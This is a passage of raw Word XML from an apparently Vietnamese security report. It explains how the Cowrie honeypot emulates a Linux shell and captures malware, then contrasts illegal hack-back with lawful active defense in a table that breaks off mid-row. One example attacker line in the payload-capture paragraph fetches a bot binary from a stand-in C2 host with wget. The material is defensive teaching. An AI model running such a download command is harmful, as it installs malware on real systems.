        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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Cowrie là một hệ thống Medium-to-High Interaction Honeypot chuyên biệt cho việc giám sát giao thức SSH và Telnet, được phát triển dựa trên nền tảng framework Twisted của ngôn ngữ Python. Cowrie vốn được fork và nâng cấp toàn diện từ dự án Kippo nổi tiếng, bổ sung thêm hàng loạt tính năng hiện đại như hỗ trợ giao thức Telnet, giả lập SFTP, xuất log JSON thời gian thực và kiến trúc Proxy chuyển tiếp linh hoạt.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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Cơ chế hoạt động bên trong của Cowrie bao gồm các thành phần cốt lõi sau:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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Twisted Event-Driven Engine: Toàn bộ quá trình bắt tay SSH, trao đổi khóa mã hóa (Key Exchange), thương lượng thuật toán mã hóa đối xứng (Cipher Negotiation) và xác thực người dùng đều được xử lý bất đồng bộ bởi Twisted. Điều này cho phép Cowrie có thể duy trì hàng ngàn kết nối đồng thời từ các botnet mà không làm sụp đổ bộ nhớ hệ thống.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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Hệ thống Tệp tin Giả lập (Virtual Filesystem - fs.pickle): Thay vì để kẻ tấn công can thiệp vào ổ cứng thật của máy chủ, Cowrie sử dụng một tệp tin serialized (fs.pickle) đại diện cho cây thư mục hệ điều hành Linux Debian tiêu chuẩn (bao gồm /bin, /etc, /var, /root, /home). Khi hacker thực hiện các lệnh duyệt thư mục như ls, cd, cat, Cowrie sẽ đọc thông tin từ cấu trúc ảo này. Bất kỳ thao tác xóa file hay thay đổi quyền hạn đều chỉ tồn tại tạm thời trong bộ nhớ của phiên làm việc đó, hoàn toàn không ảnh hưởng đến hệ thống máy chủ vật lý.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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Shell Emulation Engine: Cowrie tích hợp một bộ xử lý lệnh mô phỏng cho hơn 50 lệnh Linux phổ biến nhất (cat, whoami, uname, ifconfig, ps, kill, wget, curl, crontab). Khi kẻ tấn công nhập lệnh, Cowrie sẽ phân tích cú pháp (parse arguments) và trả về kết quả giả lập giống hệt như trên máy chủ thật.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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Malware Staging &amp; Payload Capture: Đây là tính năng đắt giá nhất của Cowrie. Khi kẻ tấn công thực thi lệnh tải mã độc từ xa (ví dụ: 'wget http://malicious-c2.org/arm7 -O bot.sh'), Cowrie không dùng tiến trình wget thật mà tự động sử dụng thư viện HTTP client nội bộ để âm thầm tải file nhị phân đó về thư mục cách ly 'var/lib/cowrie/downloads', tính toán mã băm SHA256 và lưu lại dấu vết phiên làm việc.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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5. TTY Recording &amp; Structured JSON Logging: Mọi thao tác gõ phím của kẻ tấn công đều được ghi lại dưới định dạng TTY log (cho phép xem lại như một đoạn video tua lại bằng lệnh 'bin/playlog') và toàn bộ metadata sự kiện được xuất ra tệp tin cấu trúc 'cowrie.json' thời gian thực.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">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092335"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1701586922"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486400" cy="3092335"/>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2.2: Kiến trúc mô phỏng hệ thống tệp và lệnh của Cowrie Honeypot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">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2.3 Phân tích Pháp lý và Kỹ thuật về 'Tấn công ngược' (Hack-back vs. Active Defense)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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các cuộc thảo luận kỹ thuật an ninh mạng, cụm từ 'Tấn công ngược kẻ tấn công' (Counter-attack hoặc Hack-back) thường xuyên được nhắc đến như một khát vọng phản kháng của đội ngũ phòng thủ (Blue Team). Tuy nhiên, trên cả phương diện kỹ thuật thực tế và khung pháp lý quốc tế lẫn Việt Nam, việc thực hiện 'Hack-back' mù quáng tiềm ẩn những rủi ro pháp lý và kỹ thuật đặc biệt nghiêm trọng:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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Bài toán Phân định Mục tiêu (Attribution Problem): Trong không gian mạng, các tin tặc chuyên nghiệp và các mạng botnet hiếm khi tấn công trực tiếp từ máy tính cá nhân của chúng. Chúng luôn giấu mình sau nhiều lớp Proxy ẩn danh, mạng Tor, máy chủ VPN thương mại, hoặc nguy hiểm hơn là thông qua hàng triệu thiết bị IoT (Router, Camera) của các nạn nhân vô tội bị chiếm quyền điều khiển. Nếu Blue Team thực hiện 'tấn công ngược' (như phát động DoS hay khai thác lỗ hổng) vào địa chỉ IP nguồn, chúng ta sẽ trực tiếp xâm phạm và phá hoại hệ thống của bên thứ ba vô tội, biến chính mình từ nạn nhân thành tội phạm công nghệ cao.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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Khung Pháp lý Hiện hành: Điều 287 và Điều 289 Bộ luật Hình sự Việt Nam năm 2015 (sửa đổi, bổ sung 2017), Luật An ninh mạng Việt Nam 2018, cũng như Đạo luật Lạm dụng và Gian lận Máy tính của Hoa Kỳ (CFAA) đều nghiêm cấm mọi hành vi truy cập bất hợp pháp, phá hoại hoặc làm gián đoạn hoạt động của mạng máy tính mà không có thẩm quyền hợp pháp, bất kể mục đích của hành vi đó là để 'tự vệ' hay 'phản đòn'.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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Chính vì lý do đó, các tổ chức an ninh mạng hàng đầu thế giới đã định nghĩa lại khái niệm phản đòn thành: **Phòng thủ Chủ động (Active Defense &amp; Active Deception)** theo chuẩn khung chiến lược **MITRE Engage (trước đây là MITRE Shield)** và **MITRE D3FEND**. Phòng thủ chủ động là nghệ thuật tác chiến hợp pháp và an toàn tuyệt đối, tập trung vào việc:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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Nhử đối phương vào các tài nguyên giả định (Decoy &amp; Lures).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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Đánh lừa và cung cấp thông tin sai lệch để đối phương tiêu hao nguồn lực vô ích (Tarpitting).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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Trinh sát ngược nguồn mở (Reverse OSINT) để nhận diện hạ tầng của đối phương mà không vi phạm pháp luật.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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Gài bẫy mồi nhử (Honeytokens) để khi kẻ tấn công mang chiến lợi phẩm về mở trên máy thật của chúng, hệ thống sẽ bắt được vị trí và danh tính thực sự của đối thủ (De-anonymization).</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013A">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2.2: So sánh toàn diện giữa Tấn công ngược bất hợp pháp và Phòng thủ chủ động hợp pháp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table7"/>
        <w:tblW w:w="94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4"/>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3134"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3134"/>
            <w:gridCol w:w="3134"/>
            <w:gridCol w:w="3134"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tiêu chí So sánh</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tấn công ngược (Hack-Back / Strike Back)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f497d" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Phòng thủ Chủ động (Active Defense / MITRE Engage)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tính Hợp pháp</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013F">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Trái pháp luật (Vi phạm Điều 287 BLHS, Luật ANM 2018).</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000140">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Hoàn toàn Hợp pháp (Tuân thủ quyền tự bảo vệ hệ thống nội bộ).</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41">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Đối tượng Tác động</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000142">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tác động trực tiếp vào máy chủ của IP tấn công (Dễ trúng máy vô tội).</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000143">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tác động trong phạm vi tài nguyên và hệ thống bẫy do ta sở hữu.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000144">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Mục tiêu Tác chiến</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000145">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Cố gắng phá hủy, xâm nhập hoặc DoS máy đối phương.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000146">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Thu thập tình báo (OSINT), làm kiệt quệ tài nguyên, lật tẩy danh tính thật.</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47">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Độ rủi ro Hệ thống</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000148">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Rất cao (Bị kiện tụng pháp lý, bị trả đũa quy mô lớn hơn).</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="f2f5f8" w:val="clear"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Rất thấp (Được bảo vệ trong môi trường Sandbox và Deception).</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Độ tin cậy Định danh</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:cs="Cambria" w:eastAsia="Cambria" w:hAnsi="Cambria"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Kém (Thường chỉ đánh trúng Proxy hoặc Botnet Zombie).</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
